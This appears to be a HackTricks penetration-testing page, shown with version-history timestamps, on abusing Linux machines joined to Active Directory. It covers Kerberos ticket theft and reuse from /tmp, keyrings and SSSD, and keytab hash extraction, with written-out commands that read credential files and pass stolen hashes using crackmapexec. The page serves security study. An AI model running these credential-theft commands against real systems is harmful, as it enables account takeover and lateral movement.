hacktricks/linux-hardening/privilege-escalation/linux-active-directory.md

147 lines
8.9 KiB
Markdown
Raw Normal View History

2022-05-01 13:25:53 +00:00
# Linux Active Directory
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2022-10-22 14:44:59 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2024-02-08 03:06:37 +00:00
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-12-05 22:29:21 +00:00
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>
2021-10-27 15:52:57 +00:00
A linux machine can also be present inside an Active Directory environment.
2021-11-30 16:46:07 +00:00
A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine.
2021-10-27 15:52:57 +00:00
2022-10-22 14:44:59 +00:00
## Enumeration
### AD enumeration from linux
2022-04-18 15:59:47 +00:00
If you have access over an AD in linux (or bash in Windows) you can try [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) to enumerate the AD.
2022-10-22 14:44:59 +00:00
You can also check the following page to learn **other ways to enumerate AD from linux**:
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}
### FreeIPA
2024-02-07 04:06:18 +00:00
FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in:
2022-10-22 14:44:59 +00:00
{% content-ref url="../freeipa-pentesting.md" %}
[freeipa-pentesting.md](../freeipa-pentesting.md)
{% endcontent-ref %}
## Playing with tickets
2022-05-01 13:25:53 +00:00
### Pass The Ticket
2021-10-27 15:52:57 +00:00
In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack:
2022-05-01 13:25:53 +00:00
{% content-ref url="../../windows-hardening/active-directory-methodology/pass-the-ticket.md" %}
[pass-the-ticket.md](../../windows-hardening/active-directory-methodology/pass-the-ticket.md)
2021-10-27 15:52:57 +00:00
{% endcontent-ref %}
2022-05-01 13:25:53 +00:00
### CCACHE ticket reuse from /tmp
2021-10-27 15:52:57 +00:00
2024-02-07 04:06:18 +00:00
CCACHE files are binary formats for **storing Kerberos credentials** are typically stored with 600 permissions in `/tmp`. These files can be identified by their **name format, `krb5cc_%{uid}`,** correlating to the user's UID. For authentication ticket verification, the **environment variable `KRB5CCNAME`** should be set to the path of the desired ticket file, enabling its reuse.
2021-10-27 15:52:57 +00:00
2021-11-30 16:46:07 +00:00
List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be **reused by setting the environment variable** with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID.
2021-10-27 15:52:57 +00:00
```bash
2024-02-07 04:06:18 +00:00
# Find tickets
2021-10-27 15:52:57 +00:00
ls /tmp/ | grep krb5cc
krb5cc_1000
2024-02-07 04:06:18 +00:00
# Prepare to use it
export KRB5CCNAME=/tmp/krb5cc_1000
2021-10-27 15:52:57 +00:00
```
2022-05-01 13:25:53 +00:00
### CCACHE ticket reuse from keyring
2021-10-27 15:52:57 +00:00
2024-02-07 04:06:18 +00:00
**Kerberos tickets stored in a process's memory can be extracted**, particularly when the machine's ptrace protection is disabled (`/proc/sys/kernel/yama/ptrace_scope`). A useful tool for this purpose is found at [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey), which facilitates the extraction by injecting into sessions and dumping tickets into `/tmp`.
To configure and use this tool, the steps below are followed:
2021-10-27 15:52:57 +00:00
```bash
git clone https://github.com/TarlogicSecurity/tickey
cd tickey/tickey
make CONF=Release
2024-02-07 04:06:18 +00:00
/tmp/tickey -i
2021-10-27 15:52:57 +00:00
```
2024-02-07 04:06:18 +00:00
This procedure will attempt to inject into various sessions, indicating success by storing extracted tickets in `/tmp` with a naming convention of `__krb_UID.ccache`.
2022-05-01 13:25:53 +00:00
### CCACHE ticket reuse from SSSD KCM
2021-10-27 15:52:57 +00:00
SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions.
2022-05-01 13:25:53 +00:00
Invoking \*\*`SSSDKCMExtractor` \*\* with the --database and --key parameters will parse the database and **decrypt the secrets**.
2021-10-27 15:52:57 +00:00
```bash
git clone https://github.com/fireeye/SSSDKCMExtractor
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
```
The **credential cache Kerberos blob can be converted into a usable Kerberos CCache** file that can be passed to Mimikatz/Rubeus.
2022-05-01 13:25:53 +00:00
### CCACHE ticket reuse from keytab
2021-10-27 15:52:57 +00:00
```bash
git clone https://github.com/its-a-feature/KeytabParser
python KeytabParser.py /etc/krb5.keytab
klist -k /etc/krb5.keytab
```
2022-05-01 13:25:53 +00:00
### Extract accounts from /etc/krb5.keytab
2021-10-27 15:52:57 +00:00
2024-02-07 04:06:18 +00:00
Service account keys, essential for services operating with root privileges, are securely stored in **`/etc/krb5.keytab`** files. These keys, akin to passwords for services, demand strict confidentiality.
2021-10-27 15:52:57 +00:00
2024-02-07 04:06:18 +00:00
To inspect the keytab file's contents, **`klist`** can be employed. The tool is designed to display key details, including the **NT Hash** for user authentication, particularly when the key type is identified as 23.
2021-10-27 15:52:57 +00:00
2024-02-07 04:06:18 +00:00
```bash
klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab
# Output includes service principal details and the NT Hash
2021-10-27 15:52:57 +00:00
```
2024-02-07 04:06:18 +00:00
For Linux users, **`KeyTabExtract`** offers functionality to extract the RC4 HMAC hash, which can be leveraged for NTLM hash reuse.
2021-10-27 15:52:57 +00:00
```bash
python3 keytabextract.py krb5.keytab
2024-02-07 04:06:18 +00:00
# Expected output varies based on hash availability
2021-10-27 15:52:57 +00:00
```
2024-02-07 04:06:18 +00:00
On macOS, **`bifrost`** serves as a tool for keytab file analysis.
2021-10-27 15:52:57 +00:00
```bash
2024-02-07 04:06:18 +00:00
./bifrost -action dump -source keytab -path /path/to/your/file
2021-10-27 15:52:57 +00:00
```
2024-02-07 04:06:18 +00:00
Utilizing the extracted account and hash information, connections to servers can be established using tools like **`crackmapexec`**.
2021-10-27 15:52:57 +00:00
```bash
2024-02-07 04:06:18 +00:00
crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN"
2021-10-27 15:52:57 +00:00
```
2022-05-01 13:25:53 +00:00
## References
2024-02-07 04:06:18 +00:00
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
* [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)
2021-10-27 15:52:57 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2022-10-22 14:44:59 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2024-02-08 03:06:37 +00:00
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-12-05 22:29:21 +00:00
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>